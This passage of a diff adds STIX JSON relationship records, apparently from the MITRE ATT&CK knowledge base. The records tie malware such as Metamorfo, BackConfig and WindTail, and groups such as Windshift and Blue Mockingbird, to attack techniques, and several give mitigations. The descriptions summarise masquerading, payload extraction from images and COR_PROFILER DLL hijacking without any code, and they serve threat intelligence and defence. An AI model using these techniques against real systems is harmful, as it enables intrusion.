+ "modified": "2020-07-07T13:49:05.463Z",
+ "created": "2020-06-24T16:55:46.379Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "course-of-action--cc2399fd-3cd3-4319-8d0a-fbd6420cdaf8",
+ "target_ref": "attack-pattern--77532a55-c283-4cd2-bc5d-2d0b65e9d88c",
+ "relationship_type": "mitigates",
+ "description": "Routinely check account role permissions to ensure only expected users and roles have permission to modify cloud firewalls. ",
+ "id": "relationship--9bb5eb8e-b05c-4890-a5aa-6c038b61d5d7",
+ "type": "relationship",
+ "modified": "2020-07-07T13:49:05.492Z",
+ "created": "2020-06-24T16:55:46.394Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "attack-pattern--77532a55-c283-4cd2-bc5d-2d0b65e9d88c",
+ "target_ref": "attack-pattern--3d333250-30e4-4a82-9edc-756c68afc529",
+ "relationship_type": "subtechnique-of",
+ "id": "relationship--dfc19325-9b8a-4cb7-80fc-dedc2cf8742a",
+ "type": "relationship",
+ "modified": "2020-06-24T16:55:46.408Z",
+ "created": "2020-06-24T16:55:46.408Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--36ede314-7db4-4d09-b53d-81bbfbe5f6f8",
+ "target_ref": "attack-pattern--c2e147a9-d1a8-4074-811a-d8789202d916",
+ "external_references": [
+ {
+ "source_name": "Trend Micro Tick November 2019",
+ "url": "https://documents.trendmicro.com/assets/pdf/Operation-ENDTRADE-TICK-s-Multi-Stage-Backdoors-for-Attacking-Industries-and-Stealing-Classified-Data.pdf",
+ "description": "Chen, J. et al. (2019, November). Operation ENDTRADE: TICK\u2019s Multi-Stage Backdoors for Attacking Industries and Stealing Classified Data. Retrieved June 9, 2020."
+ }
+ ],
+ "description": "[Avenger](https://attack.mitre.org/software/S0473) can extract backdoor malware from downloaded images.(Citation: Trend Micro Tick November 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--c748a743-6d63-4287-a86a-d799e14fcd99",
+ "type": "relationship",
+ "modified": "2020-06-24T17:41:52.664Z",
+ "created": "2020-06-24T17:41:52.664Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--d2c7f8ad-3b50-4cfa-bbb1-799eff06fb40",
+ "target_ref": "attack-pattern--c2e147a9-d1a8-4074-811a-d8789202d916",
+ "external_references": [
+ {
+ "source_name": "Trend Micro Tick November 2019",
+ "url": "https://documents.trendmicro.com/assets/pdf/Operation-ENDTRADE-TICK-s-Multi-Stage-Backdoors-for-Attacking-Industries-and-Stealing-Classified-Data.pdf",
+ "description": "Chen, J. et al. (2019, November). Operation ENDTRADE: TICK\u2019s Multi-Stage Backdoors for Attacking Industries and Stealing Classified Data. Retrieved June 9, 2020."
+ }
+ ],
+ "description": "[build_downer](https://attack.mitre.org/software/S0471) can extract malware from a downloaded JPEG.(Citation: Trend Micro Tick November 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--5342c0fb-0f4d-456a-a7e7-525c60b7f82e",
+ "type": "relationship",
+ "modified": "2020-06-24T17:45:50.049Z",
+ "created": "2020-06-24T17:45:50.049Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--81c57a96-fc8c-4f91-af8e-63e24c2927c2",
+ "target_ref": "attack-pattern--1c4e5d32-1fe9-4116-9d9d-59e3925bd6a2",
+ "external_references": [
+ {
+ "source_name": "Medium Metamorfo Apr 2020",
+ "url": "https://medium.com/@chenerlich/the-avast-abuser-metamorfo-banking-malware-hides-by-abusing-avast-executable-ac9b8b392767",
+ "description": "Erlich, C. (2020, April 3). The Avast Abuser: Metamorfo Banking Malware Hides By Abusing Avast Executable. Retrieved May 26, 2020."
+ }
+ ],
+ "description": "[Metamorfo](https://attack.mitre.org/software/S0455) has disguised an MSI file as the Adobe Acrobat Reader Installer.(Citation: Medium Metamorfo Apr 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--d6829fd4-7c9b-495f-9689-d1be1939f99e",
+ "type": "relationship",
+ "modified": "2020-06-24T18:16:36.574Z",
+ "created": "2020-06-24T18:16:36.574Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--81c57a96-fc8c-4f91-af8e-63e24c2927c2",
+ "target_ref": "attack-pattern--3ccef7ae-cb5e-48f6-8302-897105fbf55c",
+ "external_references": [
+ {
+ "source_name": "Medium Metamorfo Apr 2020",
+ "url": "https://medium.com/@chenerlich/the-avast-abuser-metamorfo-banking-malware-hides-by-abusing-avast-executable-ac9b8b392767",
+ "description": "Erlich, C. (2020, April 3). The Avast Abuser: Metamorfo Banking Malware Hides By Abusing Avast Executable. Retrieved May 26, 2020."
+ }
+ ],
+ "description": "Upon execution, [Metamorfo](https://attack.mitre.org/software/S0455) has unzipped itself after being downloaded to the system.(Citation: Medium Metamorfo Apr 2020) ",
+ "relationship_type": "uses",
+ "id": "relationship--f264330f-3c9f-4a2a-a6f6-904a9139bbf5",
+ "type": "relationship",
+ "modified": "2020-06-24T19:26:00.547Z",
+ "created": "2020-06-24T19:26:00.547Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--81c57a96-fc8c-4f91-af8e-63e24c2927c2",
+ "target_ref": "attack-pattern--391d824f-0ef1-47a0-b0ee-c59a75e27670",
+ "external_references": [
+ {
+ "source_name": "Medium Metamorfo Apr 2020",
+ "url": "https://medium.com/@chenerlich/the-avast-abuser-metamorfo-banking-malware-hides-by-abusing-avast-executable-ac9b8b392767",
+ "description": "Erlich, C. (2020, April 3). The Avast Abuser: Metamorfo Banking Malware Hides By Abusing Avast Executable. Retrieved May 26, 2020."
+ }
+ ],
+ "description": "[Metamorfo](https://attack.mitre.org/software/S0455) has used native WINAPI calls.(Citation: Medium Metamorfo Apr 2020) ",
+ "relationship_type": "uses",
+ "id": "relationship--3c132a1b-053d-450b-8a4f-cabf30317075",
+ "type": "relationship",
+ "modified": "2020-06-24T19:58:56.859Z",
+ "created": "2020-06-24T19:58:56.859Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--81c57a96-fc8c-4f91-af8e-63e24c2927c2",
+ "target_ref": "attack-pattern--cbb66055-0325-4111-aca0-40547b6ad5b0",
+ "external_references": [
+ {
+ "source_name": "Medium Metamorfo Apr 2020",
+ "url": "https://medium.com/@chenerlich/the-avast-abuser-metamorfo-banking-malware-hides-by-abusing-avast-executable-ac9b8b392767",
+ "description": "Erlich, C. (2020, April 3). The Avast Abuser: Metamorfo Banking Malware Hides By Abusing Avast Executable. Retrieved May 26, 2020."
+ }
+ ],
+ "description": "[Metamorfo](https://attack.mitre.org/software/S0455) has hidden its GUI using the ShowWindow() WINAPI call.(Citation: Medium Metamorfo Apr 2020) ",
+ "relationship_type": "uses",
+ "id": "relationship--ef934eda-a3ad-40fb-8923-fc2f72fb8f6e",
+ "type": "relationship",
+ "modified": "2020-06-24T19:58:56.888Z",
+ "created": "2020-06-24T19:58:56.888Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--c13d9621-aca7-436b-ab3d-3a95badb3d00",
+ "target_ref": "attack-pattern--e6919abc-99f9-4c6c-95a5-14761e7b2add",
+ "external_references": [
+ {
+ "source_name": "Unit 42 BackConfig May 2020",
+ "url": "https://unit42.paloaltonetworks.com/updated-backconfig-malware-targeting-government-and-military-organizations/",
+ "description": "Hinchliffe, A. and Falcone, R. (2020, May 11). Updated BackConfig Malware Targeting Government and Military Organizations in South Asia. Retrieved June 17, 2020."
+ }
+ ],
+ "description": "[BackConfig](https://attack.mitre.org/software/S0475) can download and execute additional payloads on a compromised host.(Citation: Unit 42 BackConfig May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--197ade21-6787-4ed3-a3ce-ff4b59b2f15c",
+ "type": "relationship",
+ "modified": "2020-06-24T20:29:46.153Z",
+ "created": "2020-06-24T20:29:46.153Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--c13d9621-aca7-436b-ab3d-3a95badb3d00",
+ "target_ref": "attack-pattern--1c4e5d32-1fe9-4116-9d9d-59e3925bd6a2",
+ "external_references": [
+ {
+ "source_name": "Unit 42 BackConfig May 2020",
+ "url": "https://unit42.paloaltonetworks.com/updated-backconfig-malware-targeting-government-and-military-organizations/",
+ "description": "Hinchliffe, A. and Falcone, R. (2020, May 11). Updated BackConfig Malware Targeting Government and Military Organizations in South Asia. Retrieved June 17, 2020."
+ }
+ ],
+ "description": "[BackConfig](https://attack.mitre.org/software/S0475) has hidden malicious payloads in %USERPROFILE%\\Adobe\\Driver\\dwg\\ and mimicked the legitimate DHCP service binary.(Citation: Unit 42 BackConfig May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--ebf39235-749f-400e-aeb9-185df9e43fe1",
+ "type": "relationship",
+ "modified": "2020-06-29T15:22:59.271Z",
+ "created": "2020-06-24T20:43:18.213Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "attack-pattern--ffeb0780-356e-4261-b036-cfb6bd234335",
+ "target_ref": "attack-pattern--aedfca76-3b30-4866-b2aa-0f1d7fd1e4b6",
+ "relationship_type": "subtechnique-of",
+ "id": "relationship--fc787de3-8a82-43f6-b649-f01a7006be54",
+ "type": "relationship",
+ "modified": "2020-06-24T22:30:55.923Z",
+ "created": "2020-06-24T22:30:55.923Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "course-of-action--93e7968a-9074-4eac-8ae9-9f5200ec3317",
+ "target_ref": "attack-pattern--ffeb0780-356e-4261-b036-cfb6bd234335",
+ "relationship_type": "mitigates",
+ "description": "Limit the privileges of user accounts so that only authorized administrators can edit system environment variables.",
+ "id": "relationship--fd47b0c7-e1d9-4e6d-8081-4e56ecb1ad03",
+ "type": "relationship",
+ "modified": "2020-06-26T16:09:59.148Z",
+ "created": "2020-06-24T22:37:51.030Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "course-of-action--47e0e9fe-96ce-4f65-8bb1-8be1feacb5db",
+ "target_ref": "attack-pattern--ffeb0780-356e-4261-b036-cfb6bd234335",
+ "relationship_type": "mitigates",
+ "description": "Identify and block potentially malicious unmanaged COR_PROFILER profiling DLLs by using application control solutions like AppLocker that are capable of auditing and/or blocking unapproved DLLs.(Citation: Beechey 2010)(Citation: Windows Commands JPCERT)(Citation: NSA MS AppLocker)",
+ "id": "relationship--caf19942-8346-447f-9781-28a0b858c43f",
+ "external_references": [
+ {
+ "url": "http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599",
+ "description": "Beechey, J. (2010, December). Application Whitelisting: Panacea or Propaganda?. Retrieved November 18, 2014.",
+ "source_name": "Beechey 2010"
+ },
+ {
+ "url": "http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html",
+ "description": "Tomonaga, S. (2016, January 26). Windows Commands Abused by Attackers. Retrieved February 2, 2016.",
+ "source_name": "Windows Commands JPCERT"
+ },
+ {
+ "url": "https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm",
+ "description": "NSA Information Assurance Directorate. (2014, August). Application Whitelisting Using Microsoft AppLocker. Retrieved March 31, 2016.",
+ "source_name": "NSA MS AppLocker"
+ }
+ ],
+ "type": "relationship",
+ "modified": "2020-06-26T16:09:59.180Z",
+ "created": "2020-06-24T22:37:51.034Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--73a80fab-2aa3-48e0-a4d0-3a4828200aee",
+ "target_ref": "attack-pattern--ffeb0780-356e-4261-b036-cfb6bd234335",
+ "external_references": [
+ {
+ "source_name": "RedCanary Mockingbird May 2020",
+ "url": "https://redcanary.com/blog/blue-mockingbird-cryptominer/",
+ "description": "Lambert, T. (2020, May 7). Introducing Blue Mockingbird. Retrieved May 26, 2020."
+ }
+ ],
+ "description": "[Blue Mockingbird](https://attack.mitre.org/groups/G0108) has used wmic.exe and Windows Registry modifications to set the COR_PROFILER environment variable to execute a malicious DLL whenever a process loads the .NET CLR.(Citation: RedCanary Mockingbird May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--0e7ce20c-1a4f-4361-a954-1d7a164baca1",
+ "type": "relationship",
+ "modified": "2020-06-25T13:59:10.215Z",
+ "created": "2020-06-24T23:51:51.525Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--afec6dc3-a18e-4b62-b1a4-5510e1a498d1",
+ "target_ref": "malware--0d1f9f5b-11ea-42c3-b5f4-63cce0122541",
+ "external_references": [
+ {
+ "source_name": "SANS Windshift August 2018",
+ "url": "https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1554718868.pdf",
+ "description": "Karim, T. (2018, August). TRAILS OF WINDSHIFT. Retrieved June 25, 2020."
+ },
+ {
+ "source_name": "objective-see windtail1 dec 2018",
+ "url": "https://objective-see.com/blog/blog_0x3B.html",
+ "description": "Wardle, Patrick. (2018, December 20). Middle East Cyber-Espionage analyzing WindShift's implant: OSX.WindTail (part 1). Retrieved October 3, 2019."
+ },
+ {
+ "source_name": "objective-see windtail2 jan 2019",
+ "url": "https://objective-see.com/blog/blog_0x3D.html",
+ "description": "Wardle, Patrick. (2019, January 15). Middle East Cyber-Espionage analyzing WindShift's implant: OSX.WindTail (part 2). Retrieved October 3, 2019."
+ }
+ ],
+ "description": "(Citation: SANS Windshift August 2018)(Citation: objective-see windtail1 dec 2018)(Citation: objective-see windtail2 jan 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--4fb841dd-93d8-404a-8738-5fe19a53c730",
+ "type": "relationship",
+ "modified": "2020-06-25T17:22:29.070Z",
+ "created": "2020-06-25T17:22:29.070Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--afec6dc3-a18e-4b62-b1a4-5510e1a498d1",
+ "target_ref": "attack-pattern--232b7f21-adf9-4b42-b936-b9d6f7df856e",
+ "external_references": [
+ {
+ "source_name": "SANS Windshift August 2018",
+ "url": "https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1554718868.pdf",
+ "description": "Karim, T. (2018, August). TRAILS OF WINDSHIFT. Retrieved June 25, 2020."
+ }
+ ],
+ "description": "[Windshift](https://attack.mitre.org/groups/G0112) has used e-mail attachments to lure victims into executing malicious code.(Citation: SANS Windshift August 2018)",
+ "relationship_type": "uses",
+ "id": "relationship--f7800d2b-7eb5-4efe-ac8d-503c187d18ef",
+ "type": "relationship",
+ "modified": "2020-06-25T17:48:41.169Z",
+ "created": "2020-06-25T17:48:41.169Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--afec6dc3-a18e-4b62-b1a4-5510e1a498d1",
+ "target_ref": "attack-pattern--ef67e13e-5598-4adc-bdb2-998225874fa9",
+ "external_references": [
+ {
+ "source_name": "SANS Windshift August 2018",
+ "url": "https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1554718868.pdf",
+ "description": "Karim, T. (2018, August). TRAILS OF WINDSHIFT. Retrieved June 25, 2020."
+ }
+ ],
+ "description": "[Windshift](https://attack.mitre.org/groups/G0112) has used links embedded in e-mails to lure victims into executing malicious code.(Citation: SANS Windshift August 2018)",
+ "relationship_type": "uses",
+ "id": "relationship--2332793b-afd0-407b-a1dc-97c5c7580bcb",
+ "type": "relationship",
+ "modified": "2020-06-25T17:48:41.195Z",
+ "created": "2020-06-25T17:48:41.195Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--afec6dc3-a18e-4b62-b1a4-5510e1a498d1",
+ "target_ref": "attack-pattern--b4b7458f-81f2-4d38-84be-1c5ba0167a52",
+ "external_references": [
+ {
+ "source_name": "objective-see windtail1 dec 2018",
+ "url": "https://objective-see.com/blog/blog_0x3B.html",
+ "description": "Wardle, Patrick. (2018, December 20). Middle East Cyber-Espionage analyzing WindShift's implant: OSX.WindTail (part 1). Retrieved October 3, 2019."
+ },
+ {
+ "source_name": "SANS Windshift August 2018",
+ "url": "https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1554718868.pdf",
+ "description": "Karim, T. (2018, August). TRAILS OF WINDSHIFT. Retrieved June 25, 2020."
+ }
+ ],
+ "description": "[Windshift](https://attack.mitre.org/groups/G0112) has used revoked certificates to sign malware.(Citation: objective-see windtail1 dec 2018)(Citation: SANS Windshift August 2018)",
+ "relationship_type": "uses",
+ "id": "relationship--893c9a7a-7f2c-4b96-877e-06870d5f989f",
+ "type": "relationship",
+ "modified": "2020-06-25T17:48:41.211Z",
+ "created": "2020-06-25T17:48:41.211Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--afec6dc3-a18e-4b62-b1a4-5510e1a498d1",
+ "target_ref": "attack-pattern--2b742742-28c3-4e1b-bab7-8350d6300fa7",
+ "external_references": [
+ {
+ "source_name": "SANS Windshift August 2018",
+ "url": "https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1554718868.pdf",
+ "description": "Karim, T. (2018, August). TRAILS OF WINDSHIFT. Retrieved June 25, 2020."
+ }
+ ],
+ "description": "[Windshift](https://attack.mitre.org/groups/G0112) has sent spearphishing emails with links to harvest credentials and deliver malware.(Citation: SANS Windshift August 2018)",
+ "relationship_type": "uses",
+ "id": "relationship--88157c8d-48d7-4114-8783-d22999a8f990",
+ "type": "relationship",
+ "modified": "2020-06-25T17:48:41.203Z",
+ "created": "2020-06-25T17:48:41.203Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--afec6dc3-a18e-4b62-b1a4-5510e1a498d1",
+ "target_ref": "attack-pattern--42e8de7b-37b2-4258-905a-6897815e58e0",
+ "external_references": [
+ {
+ "source_name": "objective-see windtail1 dec 2018",
+ "url": "https://objective-see.com/blog/blog_0x3B.html",
+ "description": "Wardle, Patrick. (2018, December 20). Middle East Cyber-Espionage analyzing WindShift's implant: OSX.WindTail (part 1). Retrieved October 3, 2019."
+ }
+ ],
+ "description": "[Windshift](https://attack.mitre.org/groups/G0112) has used icons mimicking MS Office files to mask malicious executables.(Citation: objective-see windtail1 dec 2018)",
+ "relationship_type": "uses",
+ "id": "relationship--ad880548-e776-4e7b-995d-ce6fdc91e865",
+ "type": "relationship",
+ "modified": "2020-06-26T13:34:33.894Z",
+ "created": "2020-06-25T17:48:41.197Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--afec6dc3-a18e-4b62-b1a4-5510e1a498d1",
+ "target_ref": "attack-pattern--2e34237d-8574-43f6-aace-ae2915de8597",
+ "external_references": [
+ {
+ "source_name": "SANS Windshift August 2018",
+ "url": "https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1554718868.pdf",
+ "description": "Karim, T. (2018, August). TRAILS OF WINDSHIFT. Retrieved June 25, 2020."
+ }
+ ],
+ "description": "[Windshift](https://attack.mitre.org/groups/G0112) has sent spearphishing emails with attachment to harvest credentials and deliver malware.(Citation: SANS Windshift August 2018)",
+ "relationship_type": "uses",
+ "id": "relationship--1ab045b8-35b4-4920-8223-d1a6b8c6ae1e",
+ "type": "relationship",
+ "modified": "2020-06-26T13:38:42.247Z",
+ "created": "2020-06-25T17:48:41.207Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--0d1f9f5b-11ea-42c3-b5f4-63cce0122541",
+ "target_ref": "attack-pattern--391d824f-0ef1-47a0-b0ee-c59a75e27670",
+ "external_references": [
+ {
+ "source_name": "objective-see windtail2 jan 2019",
+ "url": "https://objective-see.com/blog/blog_0x3D.html",
+ "description": "Wardle, Patrick. (2019, January 15). Middle East Cyber-Espionage analyzing WindShift's implant: OSX.WindTail (part 2). Retrieved October 3, 2019."
+ }
+ ],
+ "description": "[WindTail](https://attack.mitre.org/software/S0466) can invoke Apple APIs contentsOfDirectoryAtPath, pathExtension, and (string) compare.(Citation: objective-see windtail2 jan 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--1e669c57-11e8-4088-904c-84940458be8e",
+ "type": "relationship",
+ "modified": "2020-06-25T18:24:00.604Z",
+ "created": "2020-06-25T18:24:00.604Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--0d1f9f5b-11ea-42c3-b5f4-63cce0122541",
+ "target_ref": "attack-pattern--cbb66055-0325-4111-aca0-40547b6ad5b0",
+ "external_references": [
+ {
+ "source_name": "objective-see windtail1 dec 2018",
+ "url": "https://objective-see.com/blog/blog_0x3B.html",
+ "description": "Wardle, Patrick. (2018, December 20). Middle East Cyber-Espionage analyzing WindShift's implant: OSX.WindTail (part 1). Retrieved October 3, 2019."
+ }
+ ],
+ "description": "[WindTail](https://attack.mitre.org/software/S0466) can instruct the OS to execute an application without a dock icon or menu.(Citation: objective-see windtail1 dec 2018)",
+ "relationship_type": "uses",
+ "id": "relationship--ec5259f2-5a6c-4d42-bf21-f91c2df64f61",
+ "type": "relationship",
+ "modified": "2020-06-25T18:24:00.644Z",
+ "created": "2020-06-25T18:24:00.644Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--0d1f9f5b-11ea-42c3-b5f4-63cce0122541",
+ "target_ref": "attack-pattern--b4b7458f-81f2-4d38-84be-1c5ba0167a52",
+ "external_references": [
+ {
+ "source_name": "objective-see windtail1 dec 2018",
+ "url": "https://objective-see.com/blog/blog_0x3B.html",
+ "description": "Wardle, Patrick. (2018, December 20). Middle East Cyber-Espionage analyzing WindShift's implant: OSX.WindTail (part 1). Retrieved October 3, 2019."
+ }
+ ],
+ "description": "[WindTail](https://attack.mitre.org/software/S0466) has been incompletely signed with revoked certificates.(Citation: objective-see windtail1 dec 2018)",
+ "relationship_type": "uses",
+ "id": "relationship--0c837763-c44c-45cc-8c44-332667481a31",
+ "type": "relationship",
+ "modified": "2020-06-26T13:30:57.649Z",
+ "created": "2020-06-25T18:24:00.652Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--0d1f9f5b-11ea-42c3-b5f4-63cce0122541",
+ "target_ref": "attack-pattern--b3d682b6-98f2-4fb0-aa3b-b4df007ca70a",
+ "external_references": [
+ {
+ "source_name": "objective-see windtail2 jan 2019",
+ "url": "https://objective-see.com/blog/blog_0x3D.html",
+ "description": "Wardle, Patrick. (2019, January 15). Middle East Cyber-Espionage analyzing WindShift's implant: OSX.WindTail (part 2). Retrieved October 3, 2019."
+ }
+ ],
+ "description": "[WindTail](https://attack.mitre.org/software/S0466) can be delivered as a compressed, encrypted, and encoded payload.(Citation: objective-see windtail2 jan 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--4642135b-65d9-4b61-b25c-648c674c02dc",
+ "type": "relationship",
+ "modified": "2020-06-25T18:24:00.656Z",
+ "created": "2020-06-25T18:24:00.656Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--0d1f9f5b-11ea-42c3-b5f4-63cce0122541",
+ "target_ref": "attack-pattern--30208d3e-0d6b-43c8-883e-44462a514619",
+ "external_references": [
+ {
+ "source_name": "objective-see windtail2 jan 2019",
+ "url": "https://objective-see.com/blog/blog_0x3D.html",
+ "description": "Wardle, Patrick. (2019, January 15). Middle East Cyber-Espionage analyzing WindShift's implant: OSX.WindTail (part 2). Retrieved October 3, 2019."
+ }
+ ],
+ "description": "[WindTail](https://attack.mitre.org/software/S0466) can identify and add files that possess specific file extensions to an array for archiving.(Citation: objective-see windtail2 jan 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--7a6c1581-a077-4c8f-8111-3264fa9e1e9c",
+ "type": "relationship",
+ "modified": "2020-06-25T18:41:35.117Z",
+ "created": "2020-06-25T18:41:35.117Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--0d1f9f5b-11ea-42c3-b5f4-63cce0122541",
+ "target_ref": "attack-pattern--a9d4b653-6915-42af-98b2-5758c4ceee56",
+ "external_references": [
+ {
+ "source_name": "objective-see windtail1 dec 2018",
+ "url": "https://objective-see.com/blog/blog_0x3B.html",
+ "description": "Wardle, Patrick. (2018, December 20). Middle East Cyber-Espionage analyzing WindShift's implant: OSX.WindTail (part 1). Retrieved October 3, 2019."
+ }
+ ],
+ "description": "[WindTail](https://attack.mitre.org/software/S0466) can use the open command to execute an application.(Citation: objective-see windtail1 dec 2018)",
+ "relationship_type": "uses",
+ "id": "relationship--6b4a458b-d87a-4dc4-a375-46f4c1e6449a",
+ "type": "relationship",
+ "modified": "2020-06-25T18:41:35.120Z",
+ "created": "2020-06-25T18:41:35.120Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--0d1f9f5b-11ea-42c3-b5f4-63cce0122541",
+ "target_ref": "attack-pattern--f3c544dc-673c-4ef3-accb-53229f1ae077",
+ "external_references": [
+ {
+ "source_name": "objective-see windtail1 dec 2018",
+ "url": "https://objective-see.com/blog/blog_0x3B.html",
+ "description": "Wardle, Patrick. (2018, December 20). Middle East Cyber-Espionage analyzing WindShift's implant: OSX.WindTail (part 1). Retrieved October 3, 2019."
+ }
+ ],
+ "description": "[WindTail](https://attack.mitre.org/software/S0466) has the ability to generate the current date and time.(Citation: objective-see windtail1 dec 2018)",
